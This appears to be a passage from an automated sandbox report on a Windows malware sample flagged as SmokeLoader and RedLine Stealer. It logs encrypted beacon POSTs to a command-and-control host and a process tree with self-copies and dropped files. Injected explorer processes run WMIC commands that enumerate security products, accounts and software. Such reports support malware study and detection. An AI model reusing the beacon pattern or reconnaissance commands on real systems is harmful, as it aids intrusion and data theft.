                                                                                                      2024-10-07 22:22:27 UTC109OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                      2024-10-07 22:22:27 UTC285INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:22:27 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 7
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:22:27 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.45006523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:22:49 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://dcegxttxxlsj.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 109
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:22:49 UTC109OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                      2024-10-07 22:22:50 UTC285INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:22:49 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 7
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:22:50 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.45006723.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:23:14 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mqhltxselyb.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 109
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:23:14 UTC109OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                      2024-10-07 22:23:14 UTC285INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:23:14 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 7
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:23:14 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                      Data Ascii:


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:18:19:28
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\Desktop\bCnarg2O62.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\bCnarg2O62.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:18:19:34
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                      Imagebase:0x7ff72b770000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:18:19:54
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:18:20:01
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:18:20:16
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1D0F.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\1D0F.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:02F50094664F74B387AC57B1DE8679AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:18:20:40
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\jfrhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\jfrhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:02F50094664F74B387AC57B1DE8679AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:18:20:59
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\9245.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\9245.exe
                                                                                                      Imagebase:0x7ff7327a0000
                                                                                                      File size:78'336 bytes
                                                                                                      MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:18:21:00
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                      Imagebase:0x7ff778820000
                                                                                                      File size:69'632 bytes
                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:18:21:02
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0x890000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:18:21:03
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                      Imagebase:0x7ff72b770000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:18:21:04
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0x890000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:18:21:04
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd
                                                                                                      Imagebase:0x7ff793540000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:18:21:04
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff735400000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:18:21:05
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                      Imagebase:0x7ff72b770000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:18:21:05
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:18:21:06
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0x890000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:20
                                                                                                      Start time:18:21:07
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                      Imagebase:0x7ff72b770000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:21
                                                                                                      Start time:18:21:08
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:22
                                                                                                      Start time:18:21:10
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:18:21:12
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:24
                                                                                                      Start time:18:21:14
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:25
                                                                                                      Start time:18:21:19
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:26
                                                                                                      Start time:18:21:22
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:27
                                                                                                      Start time:18:21:23
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:28
                                                                                                      Start time:18:21:26
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:29
                                                                                                      Start time:18:21:33
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:30
                                                                                                      Start time:18:21:35
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:31
                                                                                                      Start time:18:21:38
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
